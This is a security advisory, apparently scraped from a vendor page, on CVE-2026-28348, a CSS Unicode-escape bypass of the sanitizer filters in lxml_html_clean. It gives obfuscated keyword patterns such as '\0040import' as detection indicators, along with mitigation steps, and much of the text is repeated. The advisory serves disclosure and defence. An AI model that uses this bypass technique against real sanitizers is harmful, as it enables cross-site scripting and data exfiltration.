CVE-2026-28348: lxml_html_clean XSS Vulnerability

CVE-2026-28348 Overview

CVE-2026-28348 is a Cross-Site Scripting (XSS) and CSS injection vulnerability in lxml_html_clean, a Python project that provides HTML cleaning functionalities copied from lxml.html.clean. Prior to version 0.4.4, the _has_sneaky_javascript() method strips backslashes before checking for dangerous CSS keywords. This behavior allows CSS Unicode escape sequences to bypass the @import and expression() filters, enabling external CSS loading or XSS attacks in older browsers.

Critical Impact
Attackers can bypass HTML sanitization filters using CSS Unicode escape sequences, potentially leading to cross-site scripting attacks or loading of external malicious CSS in applications that rely on lxml_html_clean for input sanitization.

Affected Products

lxml_html_clean versions prior to 0.4.4
Applications using lxml_html_clean for HTML sanitization
Python web applications relying on lxml.html.clean functionality

Discovery Timeline

2026-03-05 - CVE CVE-2026-28348 published to NVD
2026-03-05 - Last updated in NVD database

Technical Details for CVE-2026-28348

Vulnerability Analysis

The vulnerability resides in the _has_sneaky_javascript() method within lxml_html_clean, which is responsible for detecting and filtering potentially dangerous JavaScript patterns in CSS. The method's implementation contains a flaw in how it processes CSS content before performing security checks.

When processing CSS input, the method strips backslash characters before evaluating the content against a list of dangerous keywords such as @import and expression(). This preprocessing step inadvertently enables attackers to craft CSS payloads using Unicode escape sequences that evade detection.

CSS supports Unicode escape sequences in the format \XX or \XXXXXX where X represents hexadecimal digits. By encoding characters of dangerous keywords using these escape sequences, an attacker can construct payloads that appear benign to the filter but are interpreted as valid CSS by browsers.

For example, the @import directive could be obfuscated using Unicode escapes, allowing an attacker to load external stylesheets from attacker-controlled domains. Similarly, the expression() function, which is supported in older versions of Internet Explorer, could be encoded to execute arbitrary JavaScript within style attributes.

Root Cause

The root cause is improper output encoding handling (CWE-116) in the CSS security filtering logic. The _has_sneaky_javascript() method removes backslashes from CSS content before checking for dangerous patterns, but CSS parsers in browsers will decode Unicode escape sequences after the sanitization has occurred. This creates a disconnect between what the sanitizer sees and what the browser interprets, enabling a classic filter bypass vulnerability.

Attack Vector

The attack requires user interaction where a victim must view content containing the malicious CSS payload. The attack can be delivered through any application input that is processed by lxml_html_clean, such as user-generated content, comment fields, or any HTML input that undergoes sanitization. When the sanitized content is rendered in a browser, the CSS Unicode escape sequences are decoded, and the malicious directives are executed.

The vulnerability specifically targets:

External CSS loading via obfuscated @import statements, which can be used for data exfiltration or content injection
XSS execution via the expression() function in legacy Internet Explorer browsers

The attack is network-based, requiring no privileges on the target system, but does require user interaction to trigger. The scope is changed, meaning successful exploitation can impact resources beyond the vulnerable component.

Detection Methods for CVE-2026-28348

Indicators of Compromise

CSS content containing unusual Unicode escape sequences, particularly patterns like \0040import or \0065xpression
Web application logs showing style attributes or CSS blocks with multiple backslash-escaped characters
Requests to external stylesheets from unexpected or unknown domains referenced in user-generated content
Browser console errors related to blocked CSS resources when Content Security Policy is enforced

Detection Strategies

Implement input validation rules to detect CSS content with Unicode escape sequences in style-related contexts
Monitor for anomalous CSS patterns in user-submitted content, particularly escape sequences near CSS function calls or directives
Deploy web application firewall (WAF) rules to flag CSS content containing obfuscated @import or expression() patterns
Review application dependencies to identify usage of lxml_html_clean versions prior to 0.4.4

Monitoring Recommendations

Enable verbose logging for HTML sanitization operations to capture potentially malicious input attempts
Configure Content Security Policy (CSP) headers with style-src directives to restrict external stylesheet loading
Implement real-time monitoring for outbound connections to unknown domains that could indicate CSS-based data exfiltration
Set up dependency vulnerability scanning to alert on outdated lxml_html_clean versions in your software supply chain

How to Mitigate CVE-2026-28348

Immediate Actions Required

Upgrade lxml_html_clean to version 0.4.4 or later immediately
Review and audit all user-generated content that may have been processed by vulnerable versions
Implement Content Security Policy headers to restrict inline styles and external stylesheet sources as a defense-in-depth measure
Consider adding secondary validation for CSS content in security-critical applications

Patch Information

The vulnerability has been patched in lxml_html_clean version 0.4.4. The fix addresses the backslash stripping behavior in the _has_sneaky_javascript() method to properly handle CSS Unicode escape sequences before security filtering.

For detailed information about the fix, refer to the GitHub Security Advisory and the commit implementing the patch.

Workarounds

Implement additional CSS validation logic at the application layer that decodes Unicode escape sequences before filtering
Use Content Security Policy headers with strict style-src directives to block external CSS and inline styles where feasible
Disable or filter the expression() function and @import directive at the application level as an additional layer of defense
Consider using alternative HTML sanitization libraries that properly handle CSS Unicode escape sequences if upgrading is not immediately possible

bash

# Upgrade lxml_html_clean to patched version
pip install --upgrade lxml_html_clean>=0.4.4

# Verify installed version
pip show lxml_html_clean | grep Version

CVE-2026-28348 Overview

Critical Impact
Attackers can bypass HTML sanitization filters using CSS Unicode escape sequences, potentially leading to cross-site scripting attacks or loading of external malicious CSS in applications that rely on lxml_html_clean for input sanitization.

Affected Products

lxml_html_clean versions prior to 0.4.4
Applications using lxml_html_clean for HTML sanitization
Python web applications relying on lxml.html.clean functionality

Discovery Timeline

2026-03-05 - CVE CVE-2026-28348 published to NVD
2026-03-05 - Last updated in NVD database

Technical Details for CVE-2026-28348

Vulnerability Analysis

Root Cause

Attack Vector

The vulnerability specifically targets:

External CSS loading via obfuscated @import statements, which can be used for data exfiltration or content injection
XSS execution via the expression() function in legacy Internet Explorer browsers

Detection Methods for CVE-2026-28348

Indicators of Compromise

CSS content containing unusual Unicode escape sequences, particularly patterns like \0040import or \0065xpression
Web application logs showing style attributes or CSS blocks with multiple backslash-escaped characters
Requests to external stylesheets from unexpected or unknown domains referenced in user-generated content
Browser console errors related to blocked CSS resources when Content Security Policy is enforced

Detection Strategies

Implement input validation rules to detect CSS content with Unicode escape sequences in style-related contexts
Monitor for anomalous CSS patterns in user-submitted content, particularly escape sequences near CSS function calls or directives
Deploy web application firewall (WAF) rules to flag CSS content containing obfuscated @import or expression() patterns
Review application dependencies to identify usage of lxml_html_clean versions prior to 0.4.4

Monitoring Recommendations

Enable verbose logging for HTML sanitization operations to capture potentially malicious input attempts
Configure Content Security Policy (CSP) headers with style-src directives to restrict external stylesheet loading
Implement real-time monitoring for outbound connections to unknown domains that could indicate CSS-based data exfiltration
Set up dependency vulnerability scanning to alert on outdated lxml_html_clean versions in your software supply chain

How to Mitigate CVE-2026-28348

Immediate Actions Required

Upgrade lxml_html_clean to version 0.4.4 or later immediately
Review and audit all user-generated content that may have been processed by vulnerable versions
Implement Content Security Policy headers to restrict inline styles and external stylesheet sources as a defense-in-depth measure
Consider adding secondary validation for CSS content in security-critical applications

Patch Information

For detailed information about the fix, refer to the GitHub Security Advisory and the commit implementing the patch.

Workarounds

Implement additional CSS validation logic at the application layer that decodes Unicode escape sequences before filtering
Use Content Security Policy headers with strict style-src directives to block external CSS and inline styles where feasible
Disable or filter the expression() function and @import directive at the application level as an additional layer of defense
Consider using alternative HTML sanitization libraries that properly handle CSS Unicode escape sequences if upgrading is not immediately possible

bash

# Upgrade lxml_html_clean to patched version
pip install --upgrade lxml_html_clean>=0.4.4

# Verify installed version
pip show lxml_html_clean | grep Version

CVE-2026-28348: lxml_html_clean XSS Vulnerability

CVE-2026-28348 Overview

Critical Impact

Affected Products

Discovery Timeline

Technical Details for CVE-2026-28348

Vulnerability Analysis

Root Cause

Attack Vector

Detection Methods for CVE-2026-28348

Indicators of Compromise

Detection Strategies

Monitoring Recommendations

How to Mitigate CVE-2026-28348

Immediate Actions Required

Patch Information

Workarounds

Experience the Most Advanced Cybersecurity Platform

CVE-2026-28348: lxml_html_clean XSS Vulnerability

CVE-2026-28348 Overview

Critical Impact

Affected Products

Discovery Timeline

Technical Details for CVE-2026-28348

Vulnerability Analysis

Root Cause

Attack Vector

Detection Methods for CVE-2026-28348

Indicators of Compromise

Detection Strategies

Monitoring Recommendations

How to Mitigate CVE-2026-28348

Immediate Actions Required

Patch Information

Workarounds

Experience the Most Advanced Cybersecurity Platform